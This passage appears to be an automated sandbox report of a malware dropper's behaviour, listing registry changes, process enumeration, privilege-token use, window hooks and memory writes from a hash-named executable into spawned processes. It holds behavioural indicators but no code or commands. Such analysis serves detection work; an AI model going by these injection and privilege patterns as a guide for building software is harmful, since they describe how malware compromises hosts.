Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	app.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exerundll32.exeMicrosoftEdgeCP.exeguihuali-game.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e6329cde2733d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{62FM2EJ3-714D-A09D-WM25-6QFJ226I1FER}\1 = "22"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{F961600B-A42E-433A-B2B9-FC0E6F3D1352} = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 51a319d02733d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000d0e3d4bb52339b04d210f0c565142aa59035427b064e57c5af90efcabd24d0f39854a2dcf9008086dc47da6f7aeb12dabb50ca5463891564051e	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	guihuali-game.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 1d24df8b702cd701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 62ed76d52733d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

rundll32.exesvchost.exejfiag3g_gg.exeRunWW.exeprolab.tmp2520276.exe7503414.exeKudyhuvaqae.exe

pid	process
2800	rundll32.exe
2800	rundll32.exe
1920	svchost.exe
1920	svchost.exe
4584	jfiag3g_gg.exe
4584	jfiag3g_gg.exe
3020	RunWW.exe
3020	RunWW.exe
3020	RunWW.exe
3020	RunWW.exe
3020	RunWW.exe
3020	RunWW.exe
3020	RunWW.exe
3020	RunWW.exe
3888	prolab.tmp
3888	prolab.tmp
2296	2520276.exe
2296	2520276.exe
1280	7503414.exe
1280	7503414.exe
1280	7503414.exe
2296	2520276.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe

Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

MicrosoftEdgeCP.exetoolspab1.execmd.exe

pid process

5596 MicrosoftEdgeCP.exe
5596 MicrosoftEdgeCP.exe
5596 MicrosoftEdgeCP.exe
2152 toolspab1.exe
2160 cmd.exe
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

Windows Host.exe

pid process

4256 Windows Host.exe

pid	process
5596	MicrosoftEdgeCP.exe
5596	MicrosoftEdgeCP.exe
5596	MicrosoftEdgeCP.exe
2152	toolspab1.exe
2160	cmd.exe

pid	process
4256	Windows Host.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Three.exeJoSetp.exeBarSetpFile.exerundll32.exesvchost.exe7945204.exe1706868.exe2520276.exe7503414.exesvchost.exealpATCHInO.exeysAGEL.exe

description	pid	process
Token: SeDebugPrivilege	3108	Three.exe
Token: SeDebugPrivilege	3656	JoSetp.exe
Token: SeDebugPrivilege	928	BarSetpFile.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeTcbPrivilege	1920	svchost.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	4392	7945204.exe
Token: SeDebugPrivilege	4352	1706868.exe
Token: SeDebugPrivilege	2296	2520276.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	1280	7503414.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeAssignPrimaryTokenPrivilege	2620	svchost.exe
Token: SeIncreaseQuotaPrivilege	2620	svchost.exe
Token: SeSecurityPrivilege	2620	svchost.exe
Token: SeTakeOwnershipPrivilege	2620	svchost.exe
Token: SeLoadDriverPrivilege	2620	svchost.exe
Token: SeSystemtimePrivilege	2620	svchost.exe
Token: SeBackupPrivilege	2620	svchost.exe
Token: SeRestorePrivilege	2620	svchost.exe
Token: SeShutdownPrivilege	2620	svchost.exe
Token: SeSystemEnvironmentPrivilege	2620	svchost.exe
Token: SeUndockPrivilege	2620	svchost.exe
Token: SeManageVolumePrivilege	2620	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2620	svchost.exe
Token: SeIncreaseQuotaPrivilege	2620	svchost.exe
Token: SeSecurityPrivilege	2620	svchost.exe
Token: SeTakeOwnershipPrivilege	2620	svchost.exe
Token: SeLoadDriverPrivilege	2620	svchost.exe
Token: SeSystemtimePrivilege	2620	svchost.exe
Token: SeBackupPrivilege	2620	svchost.exe
Token: SeRestorePrivilege	2620	svchost.exe
Token: SeShutdownPrivilege	2620	svchost.exe
Token: SeSystemEnvironmentPrivilege	2620	svchost.exe
Token: SeUndockPrivilege	2620	svchost.exe
Token: SeManageVolumePrivilege	2620	svchost.exe
Token: SeDebugPrivilege	2260	alpATCHInO.exe
Token: SeDebugPrivilege	4188	ysAGEL.exe
Token: SeAssignPrimaryTokenPrivilege	2620	svchost.exe
Token: SeIncreaseQuotaPrivilege	2620	svchost.exe
Token: SeSecurityPrivilege	2620	svchost.exe
Token: SeTakeOwnershipPrivilege	2620	svchost.exe
Token: SeLoadDriverPrivilege	2620	svchost.exe
Token: SeSystemtimePrivilege	2620	svchost.exe
Token: SeBackupPrivilege	2620	svchost.exe
Token: SeRestorePrivilege	2620	svchost.exe
Token: SeShutdownPrivilege	2620	svchost.exe
Token: SeSystemEnvironmentPrivilege	2620	svchost.exe
Token: SeUndockPrivilege	2620	svchost.exe
Token: SeManageVolumePrivilege	2620	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2620	svchost.exe
Token: SeIncreaseQuotaPrivilege	2620	svchost.exe
Token: SeSecurityPrivilege	2620	svchost.exe
Token: SeTakeOwnershipPrivilege	2620	svchost.exe
Token: SeLoadDriverPrivilege	2620	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

prolab.tmp

pid process

3888 prolab.tmp
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exegoogle-game.exe

pid process

5656 MicrosoftEdge.exe
5596 MicrosoftEdgeCP.exe
5596 MicrosoftEdgeCP.exe
2892 google-game.exe
2892 google-game.exe

pid	process
3888	prolab.tmp

pid	process
5656	MicrosoftEdge.exe
5596	MicrosoftEdgeCP.exe
5596	MicrosoftEdgeCP.exe
2892	google-game.exe
2892	google-game.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

55CB4375683875666481DC417B20B757.exeLabPicV3.exelylal220.exeguihuali-game.exehjjgaa.exeWScript.exeBarSetpFile.exeJoSetp.exeLabPicV3.tmprundll32.exelylal220.tmpsvchost.exe

description	pid	process	target process
PID 3920 wrote to memory of 2640	3920	55CB4375683875666481DC417B20B757.exe	hjjgaa.exe
PID 3920 wrote to memory of 2640	3920	55CB4375683875666481DC417B20B757.exe	hjjgaa.exe
PID 3920 wrote to memory of 2640	3920	55CB4375683875666481DC417B20B757.exe	hjjgaa.exe
PID 3920 wrote to memory of 3020	3920	55CB4375683875666481DC417B20B757.exe	RunWW.exe
PID 3920 wrote to memory of 3020	3920	55CB4375683875666481DC417B20B757.exe	RunWW.exe
PID 3920 wrote to memory of 3020	3920	55CB4375683875666481DC417B20B757.exe	RunWW.exe
PID 3920 wrote to memory of 3776	3920	55CB4375683875666481DC417B20B757.exe	jg7_7wjg.exe
PID 3920 wrote to memory of 3776	3920	55CB4375683875666481DC417B20B757.exe	jg7_7wjg.exe
PID 3920 wrote to memory of 3776	3920	55CB4375683875666481DC417B20B757.exe	jg7_7wjg.exe
PID 3920 wrote to memory of 2812	3920	55CB4375683875666481DC417B20B757.exe	guihuali-game.exe
PID 3920 wrote to memory of 2812	3920	55CB4375683875666481DC417B20B757.exe	guihuali-game.exe
PID 3920 wrote to memory of 2812	3920	55CB4375683875666481DC417B20B757.exe	guihuali-game.exe
PID 3920 wrote to memory of 3108	3920	55CB4375683875666481DC417B20B757.exe	Three.exe
PID 3920 wrote to memory of 3108	3920	55CB4375683875666481DC417B20B757.exe	Three.exe
PID 3920 wrote to memory of 3964	3920	55CB4375683875666481DC417B20B757.exe	LabPicV3.exe
PID 3920 wrote to memory of 3964	3920	55CB4375683875666481DC417B20B757.exe	LabPicV3.exe
PID 3920 wrote to memory of 3964	3920	55CB4375683875666481DC417B20B757.exe	LabPicV3.exe
